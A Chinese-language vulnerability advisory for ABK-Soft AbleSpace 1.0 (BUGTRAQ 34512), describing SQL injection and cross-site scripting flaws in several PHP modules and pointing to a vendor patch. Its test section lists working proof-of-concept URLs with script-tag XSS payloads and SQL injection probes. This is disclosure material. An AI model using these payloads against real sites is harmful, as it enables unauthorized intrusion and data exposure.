发布日期：2009-04-14
更新日期：2009-04-27

受影响系统：

ABK-Soft AbleSpace 1.0

描述：

---

BUGTRAQ  ID: 34512

AbleSpace是一款在线社区、社交软件。

AbleSpace中的多个模块存在多个输入验证错误，远程用户可以通过提交恶意请求执行脚本注入、SQL注入和跨站脚本攻击。

1) 没有正确地验证对events_view.php模块中eid参数所传送的输入，以及对events_clndr_view.php模块中id参数所传送的输入，远程攻击者可以执行SQL注入攻击。

2) 没有正确地验证对groups_profile.php模块的gid参数及adv_cat.php模块的cat_id和razd_id参数所传送的输入，远程攻击者可以在用户浏览器会话中注入并执行任意HTML和脚本代码。

<*来源：Digital Security Research Group
  
  链接：http://secunia.com/advisories/34663/
        http://marc.info/?l=bugtraq&m=123972871931987&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://[server]/[installdir]/groups_profile.php?gid=311"><script>alert()</script>
http://[server]/[installdir]/adv_cat.php?cat_id=4"><script>alert()</script>&razd_id=45"><script>alert()</script>
http://[server]/[installdir]/events_view.php?eid=69'
http://[server]/[installdir]/events_clndr_view.php?id=1 and substring(@@version,1,1)=4
<IMG SRC=javascript:alert('XSS')>

建议：

---

厂商补丁：

ABK-Soft
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.abk-soft.com/

浏览次数：2331
严重程度：0（网友投票）